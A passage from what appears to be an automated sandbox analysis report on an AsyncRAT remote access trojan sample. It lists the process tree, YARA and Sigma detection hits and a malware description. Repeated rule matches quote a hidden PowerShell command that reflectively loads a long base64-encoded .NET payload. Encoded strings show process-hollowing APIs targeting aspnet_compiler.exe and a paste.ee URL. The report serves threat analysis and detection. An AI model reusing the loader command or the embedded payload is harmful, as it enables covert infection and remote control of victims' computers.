sAGFkdmFwaTMyLmRsbABLaWxsAHNldF9TZWN1cml0eVByb3RvY29sAFN5c3RlbS5TZWN1cml0eS5BY2Nlc3NDb250cm9sAFByb2dyYW0AU3lzdGVtAEdldEJpbmFyeUZvcm0ARW51bQByZXNvdXJjZU1hbgBieXRlc1dyaXR0ZW4ATWFpbgBTdGFydHVwSW5mb3JtYXRpb24AUHJvY2Vzc0luZm9ybWF0aW9uAHByb2Nlc3NJbmZvcm1hdGlvbgBzZWN1cml0eUluZm9ybWF0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAFNlY3VyaXR5QWN0aW9uAEludGVyYWN0aW9uAERlbGVnYXRlWndVbm1hcFZpZXdPZlNlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24AV2luMzJFeGNlcHRpb24ATWV0aG9kSW5mbwBDdWx0dXJlSW5mbwBzdGFydHVwSW5mbwBaZXJvAFNsZWVwAERlc2t0b3AATWljcm9zb2Z0LkNTaGFycABUYXIAQ2hhcgBNaWNyb3NvZnQuQ1NoYXJwLlJ1bnRpbWVCaW5kZXIAQ2FsbFNpdGVCaW5kZXIAQnVmZmVyAGJ1ZmZlcgBnZXRfUmVzb3VyY2VNYW5hZ2VyAFNlcnZpY2VQb2ludE1hbmFnZXIAQWNlUXVhbGlmaWVyAFNlY3VyaXR5SWRlbnRpZmllcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBJbmxpbmVBc3NpZ25IZWxwZXIAR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIAQml0Q29udmVydGVyAFN0ZEVycm9yAC5jdG9yAC5jY3RvcgBHZW5lcmljU2VjdXJpdHlEZXNjcmlwdG9yAHBTZWN1cml0eURlc2NyaXB0b3IAR2V0UHJvY2Vzc1NlY3VyaXR5RGVzY3JpcHRvcgBTZXRQcm9jZXNzU2VjdXJpdHlEZXNjcmlwdG9yAFJhd1NlY3VyaXR5RGVzY3JpcHRvcgByYXdTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAFJQRTEzLlByb3BlcnRpZXMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBSUEUxMy5Qcm9wZXJ0aWVzAGluaGVyaXRIYW5kbGVzAHRocmVhZEF0dHJpYnV0ZXMAcHJvY2Vzc0F0dHJpYnV0ZXMAR2V0Qnl0ZXMAYnl0ZXMAQWNlRmxhZ3MAY3JlYXRpb25GbGFncwBDU2hhcnBCaW5kZXJGbGFncwBTZXR0aW5ncwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAZ2V0X0NoYXJzAFJ1bnRpbWVIZWxwZXJzAGhQcm9jZXNzAHByb2Nlc3MAR2V0UHJvY0FkZHJlc3MAYWRkcmVzcwBQcm9jZXNzQWNjZXNzUmlnaHRzAENvbmNhdABPYmplY3QAb2JqZWN0AFByb3RlY3QAcHJvdGVjdABTeXN0ZW0uTmV0AFRhcmdldAB0YXJnZXQARXhpdABnZXRfRGVmYXVsdABJQXN5bmNSZXN1bHQAcmVzdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABlbnZpcm9ubWVudABDb252ZXJ0AFN0ZElucHV0AFN0ZE91dHB1dABTeXN0ZW0uVGV4dABEZWxlZ2F0ZVZpcnR1YWxBbGxvY0V4AGhleABJbml0aWFsaXplQXJyYXkAZ2V0X0Fzc2VtYmx5AEJsb2NrQ29weQBEZWxlZ2F0ZVJlYWRQcm9jZXNzTWVtb3J5AERlbGVnYXRlV3JpdGVQcm9jZXNzTWVtb3J5AGN1cnJlbnREaXJlY3RvcnkAU3lzdGVtLlNlY3VyaXR5AEdldEtlcm5lbE9iamVjdFNlY3VyaXR5AFNldEtlcm5lbE9iamVjdFNlY3VyaXR5AEVtcHR5AEtpdHR5AAAAAAA1UgBQAEUAMQAzAC4AUAByAG8AcABlAHIAdABpAGUAcwAuAFIAZQBzAG8AdQByAGMAZQBzAAAxaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBEAEIAWgBwAGgAAAMKAAAAAADOkqBVZTHoR4Gec5JuQU+kAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFIAEBEUEFIAIBDg4FIAEBEWUIAAESgJ0RgKEFIAASgKUHIAIBDhKApQgAARK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')).EntryPoint.Invoke($Null,$Null) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • aspnet_compiler.exe (PID: 1448 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
SourceRuleDescriptionAuthorStrings
0000000F.00000002.1735219264.000001FA636A6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    0000000F.00000002.1735219264.000001FA636A6000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0xbaf46:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    • 0xca376:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    00000010.00000002.2420233433.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000010.00000002.2420233433.0000000000402000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0xc756:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      00000010.00000002.2427144968.0000000003405000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        Click to see the 1 entries

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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